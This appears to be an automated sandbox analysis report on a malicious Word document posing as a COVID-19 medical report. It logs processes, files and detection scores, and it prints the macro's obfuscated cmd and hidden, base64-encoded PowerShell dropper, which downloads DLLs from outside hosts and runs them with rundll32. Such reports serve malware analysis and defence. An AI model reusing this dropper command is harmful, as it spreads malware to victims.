Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$-8549 Medical report COVID-19.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBAD6.tmp

Jump to behavior

Source: IU-8549 Medical report COVID-19.doc

OLE indicator, Word Document stream: true

Source: IU-8549 Medical report COVID-19.doc	OLE document summary: title field not present or empty
Source: IU-8549 Medical report COVID-19.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .........................%.....H.%.............#...............................h.......5kU.......%.....	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........%.....L.................%.....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........m.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................b.j......................v.............}..v....p.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................b.j..... v...............v.............}..v............0.................m.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................c.j......................v.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................c.j....x.m...............v.............}..v....`.......0.................m.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............Fc.j......................v.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............Fc.j..... v...............v.............}..v............0...............H.m.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............v..j....`Fm...............v.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j......................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............v..j....`Fm...............v.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j......................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............v..j....`Fm...............v.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j......................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....0.......0................Cm.....(.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j......................v.............}..v....h.......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.7.............}..v....x.......0................Cm.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0 ................v.............}..v..... ......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x'......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0(................v.............}..v.....(......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x/......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....00................v.............}..v.....0......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x7......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....08................v.............}..v.....8......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x?......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0@................v.............}..v.....@......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....xG......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0H................v.............}..v.....H......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............v..j....`Fm...............v.............}..v....xO......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....0P................v.............}..v.....P......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............v..j....`Fm...............v.............}..v....xW......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j....0X................v.............}..v.....X......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............v..j....`Fm...............v.............}..v....x_......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j....0`................v.............}..v.....`......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............v..j....`Fm...............v.............}..v....xg......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j....0h................v.............}..v.....h......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............v..j....`Fm...............v.............}..v....xo......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j....0p................v.............}..v.....p......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............v..j....`Fm...............v.............}..v....xw......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j....0x................v.............}..v.....x......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v............0.......................j.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................v.............}..v....(.......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....X.......0.......................r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................v.............}..v............0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......v..j....`Fm...............v.............}..v.... .......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................v.............}..v....X.......0................Cm.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................h.j....E.................v.............}..v............0...............x.m.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................h.j......Q...............v.............}..v....8.......0...............x.m.............................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString

Source: IU-8549 Medical report COVID-19.doc	Virustotal: Detection: 63%
Source: IU-8549 Medical report COVID-19.doc	Metadefender: Detection: 56%
Source: IU-8549 Medical report COVID-19.doc	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 